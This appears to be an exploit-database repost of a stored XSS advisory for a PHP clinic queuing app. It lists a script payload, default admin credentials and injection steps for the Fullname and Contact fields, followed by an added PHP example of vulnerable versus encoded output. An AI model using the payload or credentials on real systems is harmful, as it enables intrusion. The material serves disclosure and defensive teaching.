Clinic Queuing System - XSS

CVE: Not specified
Category: CWE-79 (Improper Neutralization of Input During Web Page Generation)
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2023-04-15
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040058

Below is a copy:

# Title : Clinic Queuing System - XSS
# Author : @Eawhitehat - Eren Arslan
# Demo available : https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html
# CVE: N/A
Used Payload :
"><script>(/eawhitehat is here/)</script>

Admin account :
Username: admin
Password: sourcecodester&123

Method :
Connect to panel : http://localhost/login.php
# Vulnerability
1. After logging in with the admin account, go to http://localhost/?page=manage_patient (+ Add Record)
2. Add the payload "><script>(/eawhitehat is here/)</script> in the "Fullname" and "Contact" fields and save.
3. After the page reloads, the XSS payload is loaded.
Enjoy !
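
The payload begins with `">`, so it only takes effect when the stored "Fullname" and "Contact" values are written back into the page without output encoding (CWE-79). The following PHP is an added example, not code from Clinic Queuing System or from the advisory author; the markup, the `$patient` record and the function names are assumptions made for illustration.

```php
<?php
// Added example: the markup and function names are hypothetical, only the
// field names and the payload string come from the advisory.

// Constructed sample record holding the payload from the advisory.
$patient = [
    'fullname' => '"><script>(/eawhitehat is here/)</script>',
    'contact'  => '"><script>(/eawhitehat is here/)</script>',
];

// Vulnerable pattern: stored values are concatenated into a quoted attribute
// and into element content with no encoding, so `">` closes the attribute
// and the <script> element becomes part of the document.
function render_row_unsafe(array $p): string
{
    return '<input type="text" name="fullname" value="' . $p['fullname'] . '">'
         . '<td>' . $p['contact'] . '</td>';
}

// Encoder for HTML text and quoted attribute values. ENT_QUOTES covers both
// quote styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning
// an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: every stored value is encoded at the point of output.
function render_row_safe(array $p): string
{
    return '<input type="text" name="fullname" value="' . e($p['fullname']) . '">'
         . '<td>' . e($p['contact']) . '</td>';
}

$unsafe = render_row_unsafe($patient);
$safe   = render_row_safe($patient);

// Compare whether a raw <script> tag survives in each rendering.
var_dump(strpos($unsafe, '<script>') !== false);
var_dump(strpos($safe, '<script>') !== false);
echo $safe, PHP_EOL;
```

Encoding at output time also neutralizes records that were saved before the fix, which input filtering alone does not.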
